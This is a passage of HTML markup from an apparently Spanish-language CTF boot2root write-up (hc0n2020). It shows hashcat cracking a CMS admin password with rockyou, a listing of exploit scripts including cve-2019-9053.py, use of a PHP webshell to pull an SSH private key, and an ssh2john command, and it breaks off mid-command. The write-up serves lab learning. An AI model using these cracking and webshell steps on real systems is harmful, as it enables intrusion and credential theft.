pre-wrap;">:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">49</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">29</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2020</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> secs)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Guess.Queue......: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">100.00</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">%)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Speed.#</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1.</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">........: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">8416</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> H/s (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1.06</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ms) @ Accel:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1024</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> Loops:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> Thr:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> Vec:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">8</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Recovered........: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">100.00</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">%) Digests, </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">100.00</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">%) Salts</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Progress.........: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2048</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">14344385</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0.01</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">%)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Rejected.........: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2048</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0.00</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">%)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Restore.Point....: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">14344385</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0.00</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">%)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Restore.Sub.#</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1.</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">..: Salt:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> Amplifier:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0-1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> Iteration:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0-1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Candidates.#</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1.</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">...: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">123456</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> -> lovers1</span></p></td></tr></tbody></table></div><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Observamos en el archivo </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">output.txt</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> la password del usuario </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">admin</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> y cuya password es </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">lalala </span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">que son válidas y que nos da acceso al panel de administración de CMS</span></p><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody><tr style="height: 0pt;"><td style="background-color: #333333; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">root</span><span style="color: #ade5fc; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">@1v4n</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:~/CTF/hc0n2020/boot2root</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># ls -la</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">total </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">24</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">drwxr-xr-x </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> root root </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">4096</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> ene </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">12</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">01:49</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> .</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">drwxr-xr-x </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">6</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> root root </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">4096</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> ene </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">11</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">18:21</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> ..</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-rw-r--r-- </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> root root </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">3370</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> ene </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">11</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">23:50</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">44976</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.py</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-rw-r--r-- </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> root root </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">6385</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> ene </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">12</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">00:53</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> cve-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2019</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">9053</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.py</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-rw------- </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> root root </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">57</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> ene </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">12</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">01:49</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> output.txt</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">root</span><span style="color: #ade5fc; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">@1v4n</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:~/CTF/hc0n2020/boot2root</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># cat output.txt </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">91f237f9a5e2d049b5d948d8a097871c:da0834c2d528bc22:</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">lalala</span></p></td></tr></tbody></table></div><br /><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Una vez dentro del Panel de administración nos ayudamos de la PHP webshell </span><a href="https://github.com/k4mpr3t/b4tm4n" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">B4TM4N SH3LL</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> para extraer las clave privada </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">id_rsa </span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">en el directorio </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/home/prequal/backup/id_rsa</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> . Nos ayudamos de JtR para encontrar la credencial de acceso por el servicio de </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ssh</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> perteneciente al usuario </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">prequal</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span></p><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody><tr style="height: 0pt;"><td style="background-color: #333333; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">root@</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">v4n:~/CTF/hc0n2020/boot2root</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"># python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash</span><span style="color: white; font-family: Consolas; font-size: 11pt; 